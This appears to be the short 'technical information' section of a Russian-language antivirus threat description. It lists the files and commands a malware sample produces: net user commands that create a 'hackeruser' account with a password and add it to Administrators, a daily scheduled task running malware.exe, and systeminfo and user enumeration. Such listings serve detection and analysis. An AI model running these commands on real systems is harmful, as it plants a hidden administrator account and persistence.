Техническая информация
- <SYSTEM32>\tasks\malwaretask
- <Текущая директория>\systeminfo.txt
- <Текущая директория>\users.txt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe'
- '<SYSTEM32>\net.exe' user hackeruser Symc4now /add
- '<SYSTEM32>\net1.exe' user hackeruser Symc4now /add
- '<SYSTEM32>\net.exe' localgroup Administrators hackeruser /add
- '<SYSTEM32>\net1.exe' localgroup Administrators hackeruser /add
- '<SYSTEM32>\schtasks.exe' /CREATE /SC DAILY /TN MalwareTask /TR c:\users\alex.zetta\AppData\Local\Temp\malware.exe /ST 22:50
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\net.exe' user
- '<SYSTEM32>\net1.exe' user